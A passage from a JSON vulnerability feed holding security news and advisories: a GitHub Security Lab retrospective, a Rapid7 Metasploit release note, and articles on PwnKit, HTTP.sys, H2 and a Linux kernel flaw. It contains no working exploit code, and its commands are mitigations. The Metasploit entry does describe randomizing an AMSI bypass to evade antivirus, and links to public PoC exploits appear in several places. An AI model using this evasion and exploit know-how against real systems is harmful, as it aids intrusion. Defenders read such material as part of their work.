We also published [guidelines](<https://securitylab.github.com/research/github-actions-building-blocks/>) and [CodeQL queries](<https://docs.github.com/code-security/code-scanning/introduction-to-code-scanning/about-code-scanning>) to find these types of vulnerabilities, and an [open source tool](<https://github.blog/2023-06-26-new-tool-to-secure-your-github-actions/>) that helps users set the right permissions for the tokens used in these pipelines to limit the damage in case of an exploit. Since the vulnerabilities were in the implementation of CI/CD pipelines the reports didn\u2019t get CVEs assigned as no immediate action was needed by the open source projects\u2019 users once they were fixed.\n\n> One pattern, which we coined as \u2018pwn request\u2019 was especially interesting because it was a combination of two unrelated features. When used together it led to a vulnerability.\n\n\\- Jaroslav Loba\u010devski, @jarlob\n\n### [CVE-2022-20186](<https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/>): Privilege escalation in Arm Mali GPU[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#cve-2022-20186-privilege-escalation-in-arm-mali-gpu>)\n\nThis one is a vulnerability in the Arm Mali GPU kernel driver that can be used to gain arbitrary kernel memory access from an untrusted app on a Pixel 6, to eventually gain root privileges and disable SELinux.\n\n> This bug somewhat kicked off a series of powerful bugs that exploited the memory management code in the Arm Mali GPU, which provided a very reliable and simple way to exploit the kernel, despite all the mitigations that were introduced in recent years.\n\n\\- Man Yue Mo, @m-y-mo\n\n## The road to the next 500 CVEs[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#the-road-to-the-next-500-cves>)\n\nWith the continuous improvements of CodeQL, and the ongoing 
modeling of new frameworks, [turbo charged by the use of Large Language Models](<https://github.blog/2023-09-12-codeql-team-uses-ai-to-power-vulnerability-detection-in-code/>) (LLMs), we are disclosing vulnerabilities faster and at a larger scale than ever before. It won\u2019t be long until we write again to celebrate the next 500 CVEs.\n\nOur dream, however, is to reach a point where the impact of the education and protection efforts\u2013from us and the community at large\u2013will balance this audit and disclosure activity, and result in finding fewer vulnerabilities in open source code. For example, because CodeQL is available for all projects via code scanning, any improvement will help us find more issues, but on the other hand an increased use of code scanning will prevent these issues from happening in the first place.\n\nBut we cannot do that alone. We need all of you.\n\n## Assemble! Securing open source is a team effort\n\nWith [CodeQL](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/codeql.com>) and [multi-repository variant analysis](<https://codeql.github.com/docs/codeql-for-visual-studio-code/running-codeql-queries-at-scale-with-mrva/>), you can multiply your audit\u2019s impact by coding an insecure pattern and finding all occurrences in your code portfolio\u2013we know that bugs are often copy/pasted throughout projects. 
You can also multiply your impact by contributing your CodeQL queries back to the open source repository, and sharing them with the community, to find and fix even more occurrences, and protect many projects\u2013as well as the open source software supply chain.\n\nIf you maintain an open source project you can enable [code scanning](<https://docs.github.com/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning>) and [Dependabot](<https://docs.github.com/code-security/dependabot/dependabot-alerts/configuring-dependabot-alerts>) for free to immediately benefit from this security knowledge as a first line of defense. I encourage you to also [enable private vulnerability reporting](<https://docs.github.com/code-security/security-advisories/working-with-repository-security-advisories/configuring-private-vulnerability-reporting-for-a-repository>) so that teams like the Security Lab, who audit open source projects, can report issues to you privately to collaborate on a fix.\n\n* * *\n\n#### References[](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/#references>)\n\n * Man Yue Mo ([@m-y-mo](<https://github.com/m-y-mo>))\n * Kevin Backhouse ([@kevinbackhouse](<https://github.com/kevinbackhouse>))\n * Alvaro Mu\u00f1oz ([@pwntester](<https://github.com/pwntester>))\n * Jaroslav Loba\u010devski ([@jarlob](<https://github.com/jarlob>))\n * [Bean Stalking: Growing Java beans into RCE](<https://securitylab.github.com/research/bean-validation-RCE/>)\n * Alvaro Mu\u00f1oz at BlackHat 2016: [A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dreamland](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf>)\n\nThe post [The GitHub Security Lab\u2019s journey to disclosing 500 CVEs in open source 
projects](<https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/>) appeared first on [The GitHub Blog](<https://github.blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T20:56:46", "type": "github", "title": "The GitHub Security Lab\u2019s journey to disclosing 500 CVEs in open source projects", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-4407", "CVE-2021-3560", "CVE-2021-45046", "CVE-2022-20186"], "modified": "2023-09-21T21:00:07", "id": "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007", "href": "https://github.blog/2023-09-21-the-github-security-labs-journey-to-disclosing-500-cves-in-open-source-projects/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-28T14:56:11", "description": "## Eternal Blue improvements\n\n\n\nPrior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. 
The Ruby module previously only supported Windows 7, and a separate `ms17_010_eternalblue_win8` Python module would target Windows 8 and above.\n\nNow Metasploit provides a single Ruby exploit module `exploits/windows/smb/ms17_010_eternalblue.rb` which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.\n\n## AmSi 0BfuSc@t!on\n\nThe Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such [technique is integrated](<https://github.com/rapid7/rex-powershell/blob/335b0eb2e32625d12fd58a1b1a569b0068ddb435/lib/rex/powershell/psh_methods.rb#L93>) directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload to execute. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as `amsiInitFailed` and shuffles the placement of PowerShell expressions. With these improvements in place, PowerShell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting `Powershell::prepend_protections_bypass` to false.\n\n## VMware vCenter Server RCE\n\nOur very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. 
This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the [module documentation](<https://github.com/rapid7/metasploit-framework/blob/843a7242f4e9a5a868ff26d09428763b643933cc/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md>).\n\n## New module content (4)\n\n * [VMware vCenter Server Virtual SAN Health Check Plugin RCE](<https://github.com/rapid7/metasploit-framework/pull/15383>) by wvu and Ricter Z, which exploits [CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog>) \\- A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user.\n * [Polkit D-Bus Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15368>) by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits [CVE-2021-3560](<https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560?referrer=blog>) \\- A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`. 
Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain an SSH session first before exploiting this vulnerability.\n * [ForgeRock / OpenAM Jato Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15386>) by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464?referrer=blog>) \\- A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability in OpenAM and ForgeRock AM. Successful exploitation allows for remote code execution as the user running the OpenAM service.\n * [Windows Process Memory Dump](<https://github.com/rapid7/metasploit-framework/pull/15154>) by smashery - This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and deletes the temporary file on the target.\n\n## Enhancements and features\n\n * [#15217](<https://github.com/rapid7/metasploit-framework/pull/15217>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Removes the Python module `ms17_010_eternalblue_win8.py` and consolidates the functionality into `exploits/windows/smb/ms17_010_eternalblue.rb` \\- which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. 
This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.\n * [#15254](<https://github.com/rapid7/metasploit-framework/pull/15254>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the AMSI bypass used by modules executing PowerShell code to be randomized, making it more difficult to be detected using static signatures.\n\n## Bugs fixed\n\n * [#15362](<https://github.com/rapid7/metasploit-framework/pull/15362>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fixes a regression issue with `post/multi/manage/shell_to_meterpreter`, and other interactions with command shell based sessions\n * [#15420](<https://github.com/rapid7/metasploit-framework/pull/15420>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue where `auxiliary/scanner/ssh/eaton_xpert_backdoor` failed to load correctly\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-08T16%3A19%3A37%2B01%3A00..2021-07-15T10%3A18%3A50%2B01%3A00%22>)\n * [Full diff 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/compare/6.0.52...6.0.53>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T19:47:06", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-35464", "CVE-2021-3560"], "modified": "2021-07-16T19:47:06", "id": "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "href": "https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhI97Ku4vg4Jm_CGDvqtOuK_CPe3ndwAvsWS1laMg7it8hFSVmooGbTIBB-VyzaXv2X-jJ9DJKmHvzWRfu5IHYSqrmxP3PRqh1et84PzAFwrVjrmoJI9gmzgwDInqw1mm_idVrZpVFtMBLpwXlE4ZlWnmOhvXoPsp7JbnyYqziUoHjqiTv6Yrl6lcUH>)\n\nA 12-year-old security vulnerability has been disclosed in a 
system utility called Polkit that grants attackers root privileges on Linux systems, even as a proof-of-concept (PoC) exploit has emerged in the wild merely hours after technical details of the bug became public.\n\nDubbed \"PwnKit\" by cybersecurity firm Qualys, the weakness impacts a component in polkit called pkexec, a program that's installed by default on every major Linux distribution such as Ubuntu, Debian, Fedora, and CentOS.\n\n[Polkit](<https://en.wikipedia.org/wiki/Polkit>) (formerly called **PolicyKit**) is a toolkit for controlling system-wide privileges in Unix-like operating systems, and provides a mechanism for non-privileged processes to communicate with privileged processes.\n\n\"This vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration,\" Bharat Jogi, director of vulnerability and threat research at Qualys, [said](<https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034>), adding it \"has been hiding in plain sight for 12+ years and affects all versions of pkexec since its first version in May 2009.\"\n\nThe flaw, which concerns a case of memory corruption and has been assigned the identifier CVE-2021-4034, was reported to Linux vendors on November 18, 2021, following which patches have been issued by [Debian](<https://security-tracker.debian.org/tracker/CVE-2021-4034>), [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2022-001>), and [Ubuntu](<https://ubuntu.com/security/CVE-2021-4034>).\n\n[pkexec](<https://linux.die.net/man/1/pkexec>), analogous to the [sudo](<https://linux.die.net/man/8/sudo>) command, allows an authorized user to execute commands as another user, doubling as an alternative to sudo. 
If no username is specified, the command to be executed will be run as the administrative super user, root.\n\nPwnKit stems from an out-of-bounds write that enables the reintroduction of \"unsecure\" environment variables into pkexec's environment. While this vulnerability is not remotely exploitable, an attacker that has already established a foothold on a system via another means can weaponize the flaw to achieve full root privileges.\n\nComplicating matters is the emergence of a PoC in the wild, which CERT/CC vulnerability analyst Will Dormann [called](<https://twitter.com/wdormann/status/1486106541665226753>) \"simple and universal,\" making it absolutely vital that the patches are applied as soon as possible to contain potential threats.\n\nThe development marks the second security flaw uncovered in Polkit in as many years. In June 2021, GitHub security researcher Kevin Backhouse revealed details of a seven-year-old privilege escalation vulnerability ([CVE-2021-3560](<https://thehackernews.com/2021/06/7-year-old-polkit-flaw-lets.html>)) that could be abused to escalate permissions to the root user.\n\nOn top of that, the disclosure also arrives close on the heels of a security flaw affecting the Linux kernel ([CVE-2022-0185](<https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes>)) that could be exploited by an attacker with access to a system as an unprivileged user to escalate those rights to root and break out of containers in Kubernetes setups.
", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-26T05:39:00", "type": "thn", "title": "12-Year-Old Polkit Flaw Lets Unprivileged Linux Users Gain Root Access", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560", "CVE-2021-4034", "CVE-2022-0185"], "modified": "2022-01-27T04:34:13", "id": "THN:205C973376C6EB6419ADECED2ADA9A25", "href": "https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-02-02T00:00:00", "description": "# The Bug Report - January 2022 \n\nBy Trellix \u00b7 February 2, 2022\n\nThis story was written by Kevin McGrath\n\n#### Your Cybersecurity Comic Relief\n\n[](<https://toggl.com/>) **[Image courtesy of https://toggl.com/](<https://toggl.com/>)**\n\n##### Why am I here?\n\nOmicron is the 15th letter in the Greek alphabet, used by 
Donald Knuth to denote Big-O notation, represented zero in Ptolemy's Almagest, had the value of 70 in the practice of [isopsephy](<https://en.wikipedia.org/wiki/Isopsephy>). But for most of us, it simply represents the pandemic that _JUST. WILL. NOT. END._ Wait, you weren't interested in philosophical ramblings on the most mentioned word in January of 2022? You actually came here to read about some vulnerabilities? But, but\u2026never mind. Welcome to the January Bug Report: Surge edition! \n\n * CVE-2022-0185: Because Java devs aren't alone in forgetting to validate input!\n * CVE-2021-42392: What? You thought Log4shell would go away?\n * CVE-2022-21907: I didn't forget about you, my little worm.\n * CVE-2021-4034: PwnKit, what happens when you decide sudo is insufficient.\n\n#### CVE-2022-21907: HTTP.sys wormable bug\n\n##### What is it?\n\nFor Patch Tuesday in January 2022, Microsoft welcomed us to this new year with a [wormable vulnerability](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/worming-your-way-in-through-iis-cve-2022-21907.html>) in the HTTP.sys kernel driver. This is **the second wormable vulnerability found in HTTP.sys** in a seven-month span. That's pretty impressive, considering the code maturity of this driver. CVE-2021-31166 didn't implode the internet; hopefully, 21907 won't either! '21907 leverages the incomplete fix from '31166, **taking advantage of HTTP trailer support** (metadata at the end of a chunked message). It's unclear if this exploit relies on the presence of a TRAILER header in the final chunk or not \u2013 [**the RFC denotes it as OPTIONAL**](<https://datatracker.ietf.org/doc/html/rfc7540>). 
This is potentially a problem for network product signature writers if they can't rely on the TRAILER header.\n\nFun fact: **[_PoCs_](<https://github.com/antx-code/CVE-2022-21907>) [_are_](<https://github.com/nu11secur1ty/Windows10Exploits/blob/master/2022/CVE-2022-21907/PoC/PoC-CVE-2022-21907.py>) [_on_](<https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC>) [_GitHub_](<https://github.com/mauricelambert/CVE-2022-21907>) for this!**\n\nAnother fun fact: **We are beginning to see exploitation in the wild!** If you would like to receive up-to-date information on current threats, McAfee Insights is something you should definitely look into!\n\nWhile it might seem sensible that only IIS uses HTTP.sys, that isn't actually the case. HTTP.sys is the kernel driver that provides core HTTP handling code. Other subsystems make use of this code:\n\n * **ADFS**\n * **WinRM**\n * **Intel Support Assistant**\n\nYou can see what services are leveraging the driver with: \n\n```\nPS > netsh http show servicestate\n```\n\nThis will list the request queues and URLs associated with them running on the current system.\n\nFortunately for those who haven't bothered to update past Server 2019 or Windows 10 1809, you're in the clear\u2026unless you enabled trailer support in the registry.\n\n##### Who cares?\n\n2.4 million Twitter users. Anyone with IIS running in their environment. Anyone who uses **Docusign** (this is a rather large deal, considering the number of legally binding contracts that flow through Docusign, especially during the pandemic). According to a recent market report, **approximately 7% of Internet sites use IIS**. Even Microsoft doesn't have that many internet-facing systems, meaning there are a lot of sites besides MS using IIS. Oh, and anyone using **vulnerable-by-default versions of Windows**:\n\n * Windows 10 2004 and up (both ARM and x64)\n * Windows Server 20H2 and up\n\n##### What can I do?\n\nPatch! 
Microsoft released a patch for this vulnerability along with their announcement. Should that not be possible, it would be best to remove those systems from Internet-facing roles. Unfortunately, **there is no host-based mitigation available for current versions of Windows**.\n\nIf you are running Windows Server 1909 or Windows 10 1809, you are **not** vulnerable by default. To determine vulnerability status, execute\n\n```\nPS > Get-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Services\\HTTP\\Parameters\" | Select-Object EnableTrailerSupport\n```\n\nIf a value is returned and is non-zero, your system is vulnerable. To mitigate this, execute: \n\n```\nPS > Set-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Services\\HTTP\\Parameters\" -name EnableTrailerSupport -Value 0\n```\n\nOr simply delete that registry key.\n\n##### The Gold Standard\n\nThe good news is there is a patch available. Please apply it! If you can't apply the patch for\u2026reasons\u2026 don't fret. Trellix has you covered with Network Security Platform **(NSP) signatures** for this vuln. So, make sure you have at least updated your signature database!\n\n \n\n\n#### CVE-2021-42392: H2 wants in on this Log4Shell action!\n\n##### What is it?\n\nA Log4Shell-like [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2021-42392>) in the handling of JNDI remote class loading. While it does not leverage the bug present in Log4j (Log4j is not even required), it leverages the same **underlying technology (JNDI)**. Any attacker-controlled URL that manages to get to the database (you sanitized your input, though\u2026Right?) can gain **remote code execution** in the context of the H2 RDBMS. But of course, that won't happen to you because all queries against the database are sanitized, parameterized, and stored. Obviously. \n\n##### Who cares?\n\nSome estimates put the **usage of H2 at [nearly](<https://mvnrepository.com/artifact/com.h2database/h2>) 7,000 projects \u2013 including Log4J**. 
Makes you wonder if Log4j was ever really the problem at all, eh? Log4Shell may need renaming and have legs beyond Log4j users if that's the case. Nature always finds a way\u2026\n\n##### What can I do?\n\nH2 database versions 1.1.100 to 2.0.204 are impacted. Version 2.0.206, shipped on January 5th, 2022, remediates this vulnerability. Updating to at least version 2.0.206 would be ideal.\n\nYou could switch database engines, but that seems rather an extreme solution. Curing the disease by killing the host isn't recommended practice in IT any more than in medicine.\n\nYou could also stop using Java? While it seems similar to the above, in this case, it seems warranted. In fact, this is the best solution, clearly. Java belongs in coffee cups, not on servers.\n\n##### The Gold Standard\n\nIf patching, scrapping all Java code and switching to some other language, or swapping database engines is not possible, Trellix has you covered, as the exploits themselves will look very similar to Log4Shell.\n\nTrellix customers are [protected](<https://kcm.trellix.com/agent/index?page=content&id=KB95091>) from many different angles (for the specifics, please visit [this](<https://kcm.trellix.com/agent/index?page=content&id=KB95091>) Knowledge Base article): \n\n * Expert Rules on Endpoint Security (ENS) can pick up dangerous patterns in memory, as described in this [blog](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/log4j-and-the-memory-that-knew-too-much.html>). \n * Endpoint Security (ENS), VirusScan Enterprise (VSE), McAfee Web Gateway (MWG) can provide generic detection under the title Exploit-CVE-2021-44228.C via a \"Potentially Unwanted Software\" detection. This detection is also augmented by a list of hashes of samples related to in-the-wild campaigns exploiting this vulnerability. 
\n * Network Security Platform (NSP) can also detect the attack via User-Defined signature (provided in the KB article linked previously) \n * MVISION Endpoint Detection and Response (EDR), McAfee Active Response (MAR) can also be used to look for vulnerable systems with Real-Time Search (RTS) queries \n * McAfee SIEM got an update (Exploit Content Pack version 4.1.0) that will raise an alarm on potential exploit attempts. \n\n \n\n\n#### CVE-2022-0185: Linux kernel namespace underfl\u2026\n\n##### What is it?\n\nOn its surface, [CVE-2022-0185](<https://ubuntu.com/security/CVE-2022-0185>) is a simple integer underflow in a legacy code path. Fortunately for anyone using containers, that legacy code path is in the File System Context (FSC). While the FSC was replaced with the File Context API (FCAPI), some functionality was retained to support backwards compatibility \u2013 including the vulnerable path. The **integer underflow creates an unbounded write** for an attacker in the context of the container process itself. An attacker with access to a container can leverage this flaw to **attack the underlying host, gaining access to all other containers running on this node**. Given how popular tools like Kubernetes (k8s) have become, this is potentially concerning for anyone who uses containers for process isolation in the presence of untrusted users. This issue only affects containers using unprivileged namespaces, containers that allow the [unshare](<https://www.bleepingcomputer.com/news/security/linux-kernel-bug-can-let-hackers-escape-kubernetes-containers/>) command, or containers with the CAP_SYS_ADMIN privilege (off by default). The unshare command is blocked by default on Docker containers by the seccomp filter. Unfortunately for k8s users, **the seccomp filter is not on by default**, meaning any Kubernetes cluster is at risk.\n\nThe past is a garrote around the neck of progress, slowly strangling the life from all that is good in this world. 
In other words, backwards compatibility is frequently why we can't have nice things.\n\n##### Who cares?\n\nAnyone running a container, potentially. And even admins who aren't but allow users to run them. Or even using a container to store leftovers in \u2013 ok, that may be taking it too far. At the least, anyone running a container on a shared server should be very concerned about this, potentially removing anything mission-critical from that server until they know the underlying kernel has been updated.\n\nThe authors have written a [detailed blog](<https://www.willsroot.io/2022/01/cve-2022-0185.html>) and [released PoC code](<https://github.com/Crusaders-of-Rust/CVE-2022-0185/blob/master/exploit_kctf.c>) for this vulnerability. So, at this point, we all should care, as it\u2019s only a matter of time before malicious actors weaponize it.\n\n##### What can I do?\n\nIf you control the host, you need to update the kernel. If that's not an option (or the owner refuses), executing\n\n```\n# sysctl -w kernel.unprivileged_userns_clone=0\n```\n\nwill limit this vulnerability to only those containers with the CAP_SYS_ADMIN privilege. Removing that privilege from your containers will also mitigate this vulnerability (it is off by default).\n\nThe Red Hat recommendation for systems which don\u2019t run containers is to simply disable namespaces entirely:\n\n```\n# echo \"user.max_user_namespaces=0\" > /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n```\n\nThis also **renders that host unable to run containers**. Which, if you aren't using them, is probably a good idea anyway.\n\n##### The Gold Standard\n\nAt this point, patching or applying mitigations are your best options. Since containers are used as an isolation mechanism, an external process having visibility into a running container is unlikely. Ensure you run on a patched host or **enable the seccomp filter** on k8s. 
\n\n \n\n\n#### CVE-2021-4034: PwnKit\n\n##### What is it?\n\nCVE-2021-4034, affectionately known as PwnKit, leverages a logic bug in PolKit (formerly known as PolicyKit). PolKit is a system-wide policy management kit which provides unprivileged processes safe (or so it was believed) access to privileged processes. **The bug exists specifically in the tool pkexec** (because for some reason sudo wasn\u2019t enough, and we felt the need for _another_ setuid program to do\u2026 precisely the same thing as sudo) \u2013 an assumption is made that the argc variable is at least 1. In typical program invocation, this is obviously true. There are ways\u2026nearly all of which are indications of compromise and should be rejected by the runtime, but, hey, here we are!\n\nTypically, when using pkexec, a pop-up window appears asking for credentials. This vulnerability **bypasses that credential check** and just runs as root. Because clearly, the way to handle failure is to just hand over the keys to the kingdom and pat yourself on the back! \n\nThis is the second polkit vulnerability in 6 months. [CVE-2021-3560](<https://access.redhat.com/security/cve/CVE-2021-3560>) also bypassed the credential check using the dbus mechanism to invoke polkit. Both seem to have leveraged the same root flaw. While we\u2019re on the subject, the root cause was [initially](<https://ryiron.wordpress.com/2013/12/16/argv-silliness/>) reported in 2013, but the author didn\u2019t see a direct path to exploitation. And so, the patch languished in forsaken misery, awaiting its day to shine. It took nine long years, but shine on sweet patch! Embrace your time in the sun!\n\n##### Who cares?\n\nIt would be hard to **argue** this isn\u2019t the biggest local privilege escalation bug of the last year (get it?). This vulnerability works on most major Linux distributions running out-of-date polkit binaries, so anyone running Linux who hasn\u2019t patched since January 25th is vulnerable. 
The version numbers of polkit are a little wonky, as Debian maintains its own fork, but if you are running\n\n * less than 0.105-26ubuntu1.2 on Ubuntu 20.04 (LTS),\n * less than 0.105-31ubuntu0.1 on Ubuntu 21.10,\n * less than 0.105-31+deb11u1 on Debian bullseye, or\n * less than polkit-0.115-11.el8_4.2 on Red Hat Enterprise Linux (RHEL) 8.4 EUS\n\nthen you are vulnerable. Again, you are vulnerable if you haven\u2019t patched since January 25th. There\u2019s also [PoC code](<https://haxx.in/files/blasty-vs-pkexec.c>) in the wild, so it won\u2019t be long before this is actively exploited. \n\nOh, you trust all of your users? In that case, you have nothing to worry about. Compromised accounts are readily available. Whether it was through phishing, cracking, compromised accounts elsewhere that share the same credentials, or some other avenue of account compromise, trusting users isn\u2019t an indication that you should trust user accounts.\n\nWhile this bug was found on Linux, other UNIX distributions use polkit, including the BSDs. OpenBSD, at least, has always had mitigations in place for this \u2013 it refuses to execute a program with an argc of 0. Solaris also uses polkit, but Oracle is so secretive about Solaris that they have a paywall up even on security bulletins. Because clearly, that\u2019s the best way to hold on to customers!\n\n##### What can I do?\n\nUpdate! The patches are available from all major Linux vendors and should be applied. No reboots are required. If you choose instead to not patch, you can remove the setuid bit on pkexec:\n\n```\n# chmod 0755 /usr/bin/pkexec\n```\n\nUnfortunately, this will also stop pkexec from doing what it was designed to do. But better that than compromise, right? \n\nRed Hat has a specific-to-RHEL mitigation guide in its [security bulletin](<https://access.redhat.com/security/cve/CVE-2021-4034>). 
